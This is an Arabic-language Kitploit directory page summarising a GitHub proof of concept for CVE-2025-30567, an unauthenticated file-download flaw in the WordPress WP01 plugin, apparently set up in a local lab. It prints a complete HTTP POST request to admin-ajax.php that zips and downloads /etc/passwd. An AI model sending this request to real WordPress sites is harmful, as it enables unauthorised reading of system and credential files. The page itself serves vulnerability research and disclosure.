Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-30567 — تحميل ملف عشوائي غير مصرح به في ووردبريس WP01 | Kitploit
أدوات/GitHubGitHub/oyst3r1ng/cve-2025-30567
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHuboyst3r1ng/cve-2025-30567

CVE-2025-30567

تحميل ملف عشوائي غير مصرح به في ووردبريس WP01

عرض المستودع
11منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مقدمة

تنزيل ملف تعسفي غير مصرح به في WordPress WP01!

إعداد البيئة

الخطوة 1: قم بتنزيل المكون الإضافي WP01، ولكن...

alt text

هاها، لا تقلق، إليك الكود المصدري للمكون الإضافي.

الخطوة 2: قم بتجميع مجلد wp01 المقدم ورفعه إلى قسم المكونات الإضافية في WordPress. مثل هذا-->

alt text

التحليل

الأمر بسيط—يتم تشغيل الثغرة الأمنية عند النقطة التالية:

alt text

بعد ذلك، تحقق من مكان استدعاء طريقة make_archive.

alt text

يوجد خطافان (hook) لإجراءات AJAX—واحد للمستخدمين المسجلين وآخر للمستخدمين غير المسجلين. هذا هو سبب ثغرة الوصول غير المصرح به.

حسنًا، لنقم الآن بتشكيل الحمولة (payload) لقراءة محتويات /etc/passwd على الجهاز المحلي.

root@kitploit:~
POST /wp-admin/admin-ajax.php?action=wp01_generate_zip_archive HTTP/1.1
Host: 192.168.43.133
accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: cb_lang=zh-cn; PHPSESSID=8b29e9ec5200189ba7e72e98d4c6d017; WS_ADMIN_URL=ws://192.168.43.133/notice; WS_CHAT_URL=ws://192.168.43.133/msg; wordpress_test_cookie=WP%20Cookie%20check; XDEBUG_SESSION=PHPSTORM; wp01-lang=en; wp_lang=en_US
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

target=passwd&path=/etc/

النتائج:

alt text

alt text

حسنًا، بعد ذلك، قم بتنزيل ملف wp-01-passwd.zip هذا.

alt text

Poc

مكتوب بناءً على Pocsuite3، راجع Poc_CVE-2025-30567.py للتفاصيل.

alt text

المراجع

CVE-2025-30567

تنزيل الأداة